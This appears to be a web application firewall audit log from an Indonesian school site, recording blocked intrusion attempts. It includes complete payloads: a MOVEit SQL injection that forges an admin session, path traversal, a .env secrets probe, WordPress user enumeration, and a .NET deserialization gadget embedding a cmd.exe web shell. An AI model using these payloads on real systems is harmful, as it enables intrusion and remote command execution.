Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8db1163-Z-- --044af235-A-- [22/May/2025:22:04:00 +0700] aC884OThJmFSRJ5-OZfgxQAAAFY 103.236.140.4 38662 103.236.140.4 8181 --044af235-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 154.26.179.43 Cookie: siLockLongTermInstID=0; SenayanMember=5t1dvvd6160e6dmbg1qa9qhl40 X-Varnish: 159429942 --044af235-C-- --044af235-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --044af235-E-- --044af235-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747926240117544 3090 (- - -) Stopwatch2: 1747926240117544 3090; combined=1696, p1=433, p2=1238, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --044af235-Z-- --708a667e-A-- [22/May/2025:22:04:05 +0700] aC885Sektx75wRFPQygAZAAAAMc 103.236.140.4 38918 103.236.140.4 8181 --708a667e-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xMkyuOd6a871djR3qUJHUPPvjy');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET IpAddress='154.26.179.43' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 154.26.179.43 Cookie: siLockLongTermInstID=0; SenayanMember=5t1dvvd6160e6dmbg1qa9qhl40 X-Varnish: 159430038 --708a667e-C-- --708a667e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: 
close Content-Type: text/html; charset=iso-8859-1 --708a667e-E-- --708a667e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747926245148991 3067 (- - -) Stopwatch2: 1747926245148991 3067; combined=1625, p1=465, p2=1129, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --708a667e-Z-- --ea772653-A-- [22/May/2025:22:06:06 +0700] aC89XuThJmFSRJ5-OZfi6QAAAFA 103.236.140.4 45156 103.236.140.4 8181 --ea772653-B-- POST /userentry?accountId=/../../../tomcat/webapps/ZpoYt/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/126.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 163517867 --ea772653-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --ea772653-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea772653-E-- --ea772653-H-- Message: Access denied with code 403 (phase 2). 
Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747926366150583 13817 (- - -) Stopwatch2: 1747926366150583 13817; combined=11122, p1=1829, p2=9239, p3=0, p4=0, p5=53, sr=87, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea772653-Z-- --8ad65349-A-- [22/May/2025:22:12:11 +0700] aC8-y30O04WKE1HJ5iR63wAAAAw 103.236.140.4 57140 103.236.140.4 8181 --8ad65349-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --8ad65349-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ad65349-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747926731781371 812 (- - -) Stopwatch2: 1747926731781371 812; combined=330, p1=289, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad65349-Z-- --bf538779-A-- [22/May/2025:22:15:29 +0700] aC8_kX0O04WKE1HJ5iR66QAAAAs 103.236.140.4 57230 103.236.140.4 8181 --bf538779-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.133.62.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.133.62.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bf538779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf538779-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747926929340289 2714 (- - -) Stopwatch2: 1747926929340289 2714; combined=1416, p1=444, p2=941, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf538779-Z-- --9d5ea850-A-- [22/May/2025:22:23:27 +0700] aC9Bbyektx75wRFPQygF4wAAANQ 103.236.140.4 57446 103.236.140.4 8181 --9d5ea850-B-- POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 15909 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Content-Type: text/json cmd: echo QZPuWzkJnV X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 163522807 --9d5ea850-C-- {"ap0":"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","format":"3"} --9d5ea850-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d5ea850-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=text/json"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747927407171924 5885 (- - -) Stopwatch2: 1747927407171924 5885; combined=3860, p1=654, p2=3094, p3=40, p4=38, p5=34, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d5ea850-Z-- --7bbc6d6c-A-- [22/May/2025:22:23:34 +0700] aC9Bdiektx75wRFPQygF5AAAAME 103.236.140.4 57450 103.236.140.4 8181 --7bbc6d6c-B-- POST /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 15909 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Content-Type: text/json cmd: echo QZPuWzkJnV X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 163522810 --7bbc6d6c-C-- {"ap0":"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAE
AAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwAnQZBkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAP4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACkJgAAVwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAAQHAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAA4CYAAAAAAABIAAAAAgAFADAhAAB0BQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKcwkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgoDwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm8TAAAKB28UAAAKJgdvFQAACm8WAAAKDQZvBwAACglvFwAACt4DJt4ABm8HAAAKbxgAAAoGbwcAAApvGQAACioAARAAAAAAIgCHqQADDgAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAANABAAAjfgAAPAIAAHQCAAAjU3RyaW5ncwAAAACwBAAAJAAAACNVUwDUBAAAEAAAACNHVUlEAAAA5AQAAJAAAAAjQmxvYgAAAAAAAAACAAABRxQCAAkAAAAA+iUzABYAAAEAAAAOAAAAAgAAAAEAAAAZAAAAAgAAAAEAAAABAAAABAAAAAAACgABAAAAAAAGACkAIgAGAFYANgAGAHYANgAKAKgAnQAKAMAAnQAKAOgAnQAOABsBCAEOACMBCAEKAE8BnQAOAIYBZwEGAK8BIgASACQCGgIGAEQCGgIGAGkCIgAAAAAAAQAAAAAAAQABAAAAEAAXAAAABQABAAEAUCAAAAAAhhgwAAoAAQARADAADgAZADAACgAJADAACgAhALQAHAAhANIAIQApAN0ACgAhAPUAJgAxAAIBCgA5ADAACgA5ADQB
KwBBAEIBMAAhAFsBNQBJAJoBOgBRAKYBPwBZALYBRABBAL0BMABBAMsBSgBBAOYBSgBBAAACSgA5ABQCTwA5ADECUwBpAE8CWAAxAFkCMAAxAF8CCgAxAGUCCgAuAAsAZQAuABMAbgBcAASAAAAAAAAAAAAAAAAAAAAAAJQAAAAEAAAAAAAAAAAAAAABABkAAAAAAAIAAAAAAAAAAAAAABMAnQAAAAAAAgAAAAAAAAAAAAAAAQAiAAAAAAACAAAAAAAAAAAAAAABABkAAAAAAAAAADxNb2R1bGU+AHQyZnZ6NGlsLmRsbABFAG1zY29ybGliAFN5c3RlbQBPYmplY3QALmN0b3IAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHQyZnZ6NGlsAFN5c3RlbS5XZWIASHR0cENvbnRleHQAZ2V0X0N1cnJlbnQASHR0cFNlcnZlclV0aWxpdHkAZ2V0X1NlcnZlcgBDbGVhckVycm9yAEh0dHBSZXNwb25zZQBnZXRfUmVzcG9uc2UAQ2xlYXIAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3MAUHJvY2Vzc1N0YXJ0SW5mbwBnZXRfU3RhcnRJbmZvAHNldF9GaWxlTmFtZQBIdHRwUmVxdWVzdABnZXRfUmVxdWVzdABTeXN0ZW0uQ29sbGVjdGlvbnMuU3BlY2lhbGl6ZWQATmFtZVZhbHVlQ29sbGVjdGlvbgBnZXRfSGVhZGVycwBnZXRfSXRlbQBTdHJpbmcAQ29uY2F0AHNldF9Bcmd1bWVudHMAc2V0X1JlZGlyZWN0U3RhbmRhcmRPdXRwdXQAc2V0X1JlZGlyZWN0U3RhbmRhcmRFcnJvcgBzZXRfVXNlU2hlbGxFeGVjdXRlAFN0YXJ0AFN5c3RlbS5JTwBTdHJlYW1SZWFkZXIAZ2V0X1N0YW5kYXJkT3V0cHV0AFRleHRSZWFkZXIAUmVhZFRvRW5kAFdyaXRlAEZsdXNoAEVuZABFeGNlcHRpb24AAAAPYwBtAGQALgBlAHgAZQAAB2MAbQBkAAAHLwBjACAAAAAAAODxsDW2z09DrP9c0go3YuQACLd6XFYZNOCJ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
